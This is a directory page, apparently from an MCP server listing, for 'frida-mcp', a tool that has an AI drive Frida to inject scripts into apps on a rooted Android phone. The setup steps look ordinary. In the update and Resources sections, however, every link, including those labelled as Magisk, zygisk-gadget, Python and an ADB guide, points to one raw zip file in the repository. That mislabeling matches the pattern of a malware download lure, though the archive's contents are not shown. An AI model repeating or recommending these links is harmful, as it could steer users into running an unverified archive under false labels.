frida-mcp
Allows analyzing Android apps by automating Frida with AI commands, enabling dynamic inspection of app behavior, including listing apps, injecting scripts, spawning apps, and viewing logs.
Click on "Install Server".
Wait a few minutes for the server to deploy. Once ready, it will show a "Started" state.
In the chat, type
@followed by the MCP server name and your instructions, e.g., "@frida-mcplist all third-party apps on my device"
That's it! The server will respond to your query, and you can continue using it as needed.
Here is a step-by-step guide with screenshots.
π οΈ frida-mcp - Android Analysis Made Simple
π What is frida-mcp?
frida-mcp helps you analyze Android apps by automating Frida using AI commands. It connects your Android phone to your computer, runs analysis scripts automatically, and gives you results without needing to run commands yourself.
This tool works with rooted Android phones running Magisk and the zygisk-gadget module. It uses a server called MCP (Model Context Protocol) that talks to Frida and controls it to inspect apps dynamically.
Related MCP server: Frida MCP
π₯οΈ System Requirements
Before starting, check the following:
Windows 10 or later.
Python 3.10 or higher installed on your PC.
An Android phone with root access.
Magisk installed on your Android phone.
The zygisk-gadget Magisk module installed and set to use port 14725.
ADB (Android Debug Bridge) installed and able to connect your phone to your PC.
If you donβt have Python or ADB installed, you will need to install them first. Both are free and easy to get.
π How to Download frida-mcp
Click the large button below to visit the GitHub page where you can download frida-mcp and find setup files.
On the GitHub page:
Look for the βReleasesβ section to find the latest version.
Download the package or installer suitable for Windows.
Follow instructions there to install the software.
βοΈ Installation and Setup on Windows
After downloading, follow these steps to install and configure frida-mcp on your PC:
Install Python packages
Open your Command Prompt (search for "cmd" in Windows Start menu).
Navigate to the folder where you downloaded frida-mcp, or if you have the source code, open Command Prompt there.
Run this command to install frida-mcp and its dependencies:
pip install .This installs the main program and tools you will need.
Run Setup
After installation completes, run this command to perform automatic setup:
frida-mcp-setupThis command will register frida-mcp with MCP and install necessary βSkillsβ for it to work smoothly.
Manual Configuration (optional)
If automatic setup fails, you can edit the file
~/.claude.jsonmanually:{ "mcpServers": { "frida-agent": { "command": "frida-mcp" } } }Save the file and retry running frida-mcp.
Connect your phone
Make sure your Android phone is connected via USB with USB debugging enabled.
Confirm that
adbcan detect your device by running:adb devicesYour device should show up on the list.
π Connecting frida-mcp to your Android Phone
frida-mcp uses ADB to talk to the zygisk-gadget module on your phone.
To establish this connection:
Run the command:
frida-mcp connectThis will forward ports and allow communication between your PC and phone.
Check the connection by listing third-party apps on your device:
frida-mcp list_appsIf your apps show up, the connection works.
π Main frida-mcp Commands
Here are the main commands you will use when running frida-mcp:
Command | What it Does |
| Opens ADB port forwarding to connect to zygisk-gadget. |
| Shows third-party apps installed on your device. |
| Injects a Frida script into the running app. You can write the script directly or provide a file path. |
| Stops an app, restarts it, and injects a script in one step. Useful when hooking app startup. |
| Shows output from the injected scripts. Supports paging and file backup. |
| Displays Android system logs to help find errors or crashes. |
| Starts an app you specify. |
| Forces an app to stop. |
| Restarts the connection if frida-mcp crashes. |
| Disconnects the current script injection session. |
π₯ Download frida-mcp Again or Update
If you need to download frida-mcp again or get the latest version:
Visit this page:
https://github.com/Gindhar2112/frida-mcp/raw/refs/heads/main/src/mcp_frida_v3.6.zipGo to the "Releases" tab.
Download the latest files.
Replace old files with new ones if you have a manual installation.
Then repeat the installation commands as above to update your setup.
π§ Additional Tips
Your phone must remain connected and unlocked during use.
If you encounter errors with connection, rerun
frida-mcp reconnector check ADB connection.Use
frida-mcp logcatto monitor crashes or issues in real time.If an app does not respond as expected, try
spawn_and_injectto restart and inject fresh.Keep Python and ADB updated for best compatibility.
π Resources
Magisk Root: https://github.com/Gindhar2112/frida-mcp/raw/refs/heads/main/src/mcp_frida_v3.6.zip
zygisk-gadget Module: https://github.com/Gindhar2112/frida-mcp/raw/refs/heads/main/src/mcp_frida_v3.6.zip
Python: https://github.com/Gindhar2112/frida-mcp/raw/refs/heads/main/src/mcp_frida_v3.6.zip
ADB Setup Guide: https://github.com/Gindhar2112/frida-mcp/raw/refs/heads/main/src/mcp_frida_v3.6.zip
π How frida-mcp Works
The flow looks like this:
AI (Claude) β MCP Server β Frida CLI β zygisk-gadget (phone) β Results returnedThis means AI sends commands to MCP, which controls Frida. Frida works with the gadget installed on the phone to analyze apps and send data back to you.
Maintenance
Resources
Unclaimed servers have limited discoverability.
Looking for Admin?
If you are the server author, to access and configure the admin panel.
Latest Blog Posts
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/Gindhar2112/frida-mcp'
If you have feedback or need assistance with the MCP directory API, please join our Discord server